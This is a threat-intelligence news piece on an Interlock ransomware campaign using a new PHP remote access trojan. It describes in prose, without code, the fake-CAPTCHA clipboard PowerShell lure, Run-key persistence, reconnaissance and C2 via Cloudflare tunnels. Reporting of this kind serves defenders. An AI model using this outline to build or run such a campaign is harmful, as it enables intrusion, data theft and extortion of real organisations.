Security researchers from The DFIR Report, in collaboration with Proofpoint, have identified a significant new campaign by the Interlock ransomware group. The threat actors are leveraging a newly developed remote access trojan (RAT) to target organizations across multiple sectors, marking a notable evolution in their tactics and tooling.
Sophisticated Infection Chain
The campaign begins with the compromise of legitimate websites, where attackers inject a single-line, heavily obfuscated script into site HTML. This script is designed to evade detection and only activates under specific conditions, increasing the likelihood of bypassing security controls.
Victims are then presented with a convincing fake CAPTCHA prompt, instructing them to complete “verification steps.” These steps involve copying and pasting a string from the clipboard into the Windows Run dialog, which triggers a PowerShell script. This script downloads and executes the Interlock RAT payload, seamlessly infecting the target system.
Technical Capabilities of the New RAT
Unlike previous variants, which were based on Node.js (“NodeSnake”), the latest Interlock RAT is written in PHP. This change broadens the malware’s compatibility and persistence capabilities.
Upon execution, the RAT installs itself as a copy of php.exe within the user’s AppData\Roaming directory. It achieves persistence by registering itself in the Windows Registry “Run” key, ensuring it launches automatically with every system restart.
Once active, the RAT conducts extensive reconnaissance, gathering detailed information about the infected system, including hardware specifications, running processes, services, mounted drives, network neighbors, and user privileges. This data is serialized as JSON objects and exfiltrated to the attackers’ command and control (C2) infrastructure.
The malware leverages Cloudflare’s tunnel service (trycloudflare.com) for C2 communications, masking its true infrastructure and increasing resilience against takedown efforts. Hardcoded fallback IP addresses are also included to ensure continued operation if primary channels are blocked.
Hands-On-Keyboard Attacks and Double Extortion
Researchers have observed evidence of hands-on-keyboard activity, with attackers actively interacting with compromised systems. This includes querying Active Directory and searching for backup-related accounts, likely to maximize the impact of ransomware deployment and increase leverage during extortion attempts.
The Interlock group continues to employ double extortion tactics, encrypting files and threatening to leak stolen data if ransom demands are not met.
Broad Targeting and Escalating Threat
This campaign is notable for its broad, opportunistic targeting. Rather than focusing on a specific industry, the Interlock group is indiscriminately attacking organizations across various sectors, increasing the potential for widespread disruption.
The shift from Node.js to PHP in their RAT demonstrates the group’s adaptability and commitment to evolving their techniques to evade detection and maintain persistence within victim environments.
Summary Table: Interlock RAT Campaign
| Feature | Details |
|---|---|
| RAT Language | PHP (new), previously Node.js (“NodeSnake”) |
| Initial Access | Compromised websites, fake CAPTCHA, clipboard PowerShell execution |
| Persistence Mechanism | Registry “Run” key, AppData\Roaming\php.exe |
| Reconnaissance | System info, processes, services, network, privilege level |
| C2 Infrastructure | Cloudflare Tunnel (trycloudflare.com), fallback IPs |
| Lateral Movement | RDP, Active Directory queries |
| Target Sectors | Broad—no specific industry focus |
| Extortion Method | Double extortion (encryption + data leak threats) |
